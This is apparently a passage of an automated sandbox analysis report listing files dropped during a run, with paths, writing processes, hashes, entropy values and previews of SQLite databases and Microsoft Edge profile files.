                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.2680313905361795
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:384:L/2qOB1nxCkMzSA1LyKOMq+8iP5GDHP/0jMVumS:Kq+n0Jz91LyKOMq+8iP5GLP/0/
                                                                                                                                                                                                                                                                                                      MD5:1E7C2DB97171FF0366B78CC79317B690
                                                                                                                                                                                                                                                                                                      SHA1:1A034AAF870E7D3ACE3051AAFD8F6736B7AF3F29
                                                                                                                                                                                                                                                                                                      SHA-256:F7D2FACFD87176E929C54AFE4CE8DED5AB19E6738B5E0E8F2E74F121D99A8457
                                                                                                                                                                                                                                                                                                      SHA-512:00AA475FE9A196AD35FD83C090AD16B64B31728073CE149CCF45111446DDB18764F7997BD269C37CEC2F9CA7067094722C44594D2A547349398CA0F3D488E2CA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......[...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\ProgramData\MO8GVA1VKF37\MO8G47

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.136471148832945
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                                                                                                                                      MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                                                                                                                                      SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                                                                                                                                      SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                                                                                                                                      SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\ProgramData\MO8GVA1VKF37\ZU3E3E

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):294912
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.08436837154972243
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v2:51zkVmvQhyn+Zoz67f
                                                                                                                                                                                                                                                                                                      MD5:BDDB3A7A4643B027E8E743D32B86297D
                                                                                                                                                                                                                                                                                                      SHA1:AACAA39E60FB34908241F75550B1CEDDA50E37D1
                                                                                                                                                                                                                                                                                                      SHA-256:13BC4A6A15651C116209341E97255C67980005927DFD9E91236E2E1517AF97EF
                                                                                                                                                                                                                                                                                                      SHA-512:9A6244248CA636DB12AEC2E56DEAEAA2D62ED8378EA5A1D9947938DA15CA66BC4EDF11BF7CCC92E43734449EBECD03CF538BB61FCF90798DEBFD65098BC2A444
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4071d7e2-b3ea-49ad-9ad7-78ec01f42b21.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):45940
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.087002792247592
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:FMkbJrT8IeQc5dK0S0i1zNtZBcXOX9JVLvzrrvcnlo7wCiozJDSgzMMd6qD47u3U:FMk1rT8H1KJH2nlokFoztSmd6qE7R
                                                                                                                                                                                                                                                                                                      MD5:0AED5D79F5CB348DF93D164A744B62D5
                                                                                                                                                                                                                                                                                                      SHA1:C48199CC74F9D8AD1DC226F2D9BBB3ED34917F90
                                                                                                                                                                                                                                                                                                      SHA-256:E8A04BE8F1B8D0E808FA560BAA7EA97C15C3131329FB7FCAD6ADC6E7C1640824
                                                                                                                                                                                                                                                                                                      SHA-512:F0727C36B8F3198BB944ED83BB26495451CDF8B26F5D5AE258C077B8146DD77E7714EF83780DB09C345A4508FF9EBDBA84D5EA5B76FFEDA1CA5E68CD4E779887
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379444097451456","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"1bffdc9b-65ae-4e8f-9fb4-3197622f753a"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734970501"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4b6d1495-d4a7-433b-81a2-a0a17f89b4c4.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):45987
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.08682737200293
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:FMkbJrT8IeQc5dK0U0i1zNtZBcXOX9JVLvzrrvcnlo7wCiozJDSgzMMd6qD47u3U:FMk1rT8H1KdH2nlokFoztSmd6qE7R
                                                                                                                                                                                                                                                                                                      MD5:00DBB87EAA0B699B64F43167C8F709DF
                                                                                                                                                                                                                                                                                                      SHA1:6795B668833038E903CEF6A7CF300F6EF142AB74
                                                                                                                                                                                                                                                                                                      SHA-256:EC4327CF3B164943BAA8E5BAAFB8EFABBAC8577C0D71C535606041ADBF8EF0B9
                                                                                                                                                                                                                                                                                                      SHA-512:21FDFBC6B6FEF55DC2DCD8A54BD8A33CEF8AD3368410B0621BB6EF1CA3290DD2F2CC8C3B6F54C76F1220E522886516FF5D83E8572F47A859F27B9C4FA300BD8F
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379444097451456","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"1bffdc9b-65ae-4e8f-9fb4-3197622f753a"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734970501"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\7268d670-dc0b-496d-9f37-1477637836d2.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                      Size (bytes):44906
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.095173444193261
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWxxi1zNtZBcXOXNgTUpMEKKJDSgzMMd6qD47u3+CiB:+/Ps+wsI7ynjHIKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                      MD5:AD32AACEA077E67947B5830B4160C8CC
                                                                                                                                                                                                                                                                                                      SHA1:63B9074DCD270880F7F6E2D1316FA6BE79EBC276
                                                                                                                                                                                                                                                                                                      SHA-256:DAF1481B5613D836F7391FAF2D1615628E02605E3054320446D6518BB2793D6D
                                                                                                                                                                                                                                                                                                      SHA-512:A82D04B4ADF09C3A505AC74A42173BEC13522427E89017040227EC062ADBBD27210B0A1600E1C2A2A7FEF431593CB17B51CA99ACE958580601176ED2F27BD85C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\8c00f1ce-7e32-4c82-8657-b053daaa4f71.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44987
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.095426116869297
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4xWaxi1zNtZBcXOX9JVLvzrrvcKJDSgzMMd6qD47u3+7:+/Ps+wsI7yOgH2KtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                      MD5:BD7424BA3695067F59173201F6791F11
                                                                                                                                                                                                                                                                                                      SHA1:1212EA7BD5D0C188FE436A5788BEED12C9FD1789
                                                                                                                                                                                                                                                                                                      SHA-256:8BA7E8EE5BFFA345DAA4159929C1A280F246D877A9D6BDD2092872866AEA6BE8
                                                                                                                                                                                                                                                                                                      SHA-512:C671524FBD9D36E23F03415BAB6375F5B03322EB0D58D55A2F812733660A56983299E964401F51D8603198CD7D2FC8F3F3C738DA673AEA7145EFAA7D30D18D70
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\a7b17b1d-3c76-4834-88ff-601780a77e54.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):107893
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.640159935562401
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
                                                                                                                                                                                                                                                                                                      MD5:D50EDBCB24807CB644253C4476148A1B
                                                                                                                                                                                                                                                                                                      SHA1:CBA3D7B6C0134871E694EDEDD4430947482F654B
                                                                                                                                                                                                                                                                                                      SHA-256:F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
                                                                                                                                                                                                                                                                                                      SHA-512:B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):107893
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.640159935562401
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
                                                                                                                                                                                                                                                                                                      MD5:D50EDBCB24807CB644253C4476148A1B
                                                                                                                                                                                                                                                                                                      SHA1:CBA3D7B6C0134871E694EDEDD4430947482F654B
                                                                                                                                                                                                                                                                                                      SHA-256:F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
                                                                                                                                                                                                                                                                                                      SHA-512:B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67698C80-C0C.pma

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.45462295891366744
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3072:90lD8QiD25g0WyB6x5PkcRtRVEbNDkvI5PDi0gyyqFumo8ng1HF:yD8N4/6xdkcR6Jw6LgyyqFumo8naH
                                                                                                                                                                                                                                                                                                      MD5:13FA8C3DA521CEBAE756E12C497CA255
                                                                                                                                                                                                                                                                                                      SHA1:18778CCC052368A403EDCFE6CC90C5BDD689D30B
                                                                                                                                                                                                                                                                                                      SHA-256:5CFFD5E4DA7F7A63DC1B0A2CA35F8F4C4FB0610FA1F3478F88B791EC673C24D4
                                                                                                                                                                                                                                                                                                      SHA-512:B89C76C16C0618C2A0B51B81F01BE04017AE4B9B2AE54F57D23205DE5BE06133C916040AEED31915BBF831C2724887785687077A4C2FEFCF31F2BFD0388F661A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...@..@...@.....C.].....@...................X...............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30...............117.0.2045.55-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".rowvpo20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@....................................w..U?:K...G...W6.>.........."....."...24.."."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...Nb.X9.I@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. .`2......

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):280
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.0984945491284295
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJHCll:o1cUh4Y3LbO/BVsJDbYuDRBOycd
                                                                                                                                                                                                                                                                                                      MD5:AFAC5E4CC1213807ACB7D1A0F61BCF99
                                                                                                                                                                                                                                                                                                      SHA1:FEDCA0A829A0DBCCD1E9D7048398372FF9604783
                                                                                                                                                                                                                                                                                                      SHA-256:FF48F538CBF3D665C9B115D6F3F6459E0CD7D9DF368E921E5A4BF2CA88E3C55F
                                                                                                                                                                                                                                                                                                      SHA-512:44F1A7E8C8DD1D5CE625AE26ED4074900A979ACD34BAFB3D3B354145690D37D34E07F2D0D9DEE81BE80EAFA9E3973AB11AD6E85EB23A804958584D8DB4902D66
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:sdPC.....................cT..\.E.....P."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7aa5fc64-f4df-45d8-92ed-89470ca1c2d2............

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1af926d9-03d0-4d64-b16e-13a77111d778.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):25012
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.567736491219251
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:8ANR90WFBW5wk2f4wnn8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP62IoVL5rwXSpStW:8Wf0kBWak2fRnnu1jazc5KDtW
                                                                                                                                                                                                                                                                                                      MD5:A5083282B24199954FD36BBF017BB304
                                                                                                                                                                                                                                                                                                      SHA1:D95953ADE61F6932DF94B2C294AC8F42FFF72166
                                                                                                                                                                                                                                                                                                      SHA-256:7D7B00171B24B49031D938A6D1D20064C097993532CDCDEC247ECA1D3494B38A
                                                                                                                                                                                                                                                                                                      SHA-512:7BF3CCA36EFEC3D92F3A8EE31589C6C95F6D716F54688EFB087B7AEBC75A56A4FC531BC0BB1831B0B9A8F9BB1478BAAAEBDFA709163A11238BF2D478DD7D0482
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379444096550407","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379444096550407","location":5,"ma

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\35e6bf0b-1fd5-4fb2-90de-5ce5b50d3c8f.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):9861
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.106103229085298
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:st4kdpOsd+aFvrE9klcK84bV+F4HQA0U9PwYJ:st4QOsd+CDLbGYQKL
                                                                                                                                                                                                                                                                                                      MD5:AF9A00328A42A2381608832B7207BE40
                                                                                                                                                                                                                                                                                                      SHA1:2B76070CD54CFD74449FE07A0B856A819183CDF7
                                                                                                                                                                                                                                                                                                      SHA-256:5D5E16778A8A905B0D611A9EABF0A4D50B6C3D8D8B5994CB40795190E1929DA6
                                                                                                                                                                                                                                                                                                      SHA-512:0C0BDA0BB20773CB98529C8D7B8AF3852005415EA569D9B22739DD428D56205CCDCC15726B730A6A08D0CA7E689681AF61B4512CE2763B200F624EF994EE8C97
                                                                                                                                                                                                                                                                                                      Malicious:false
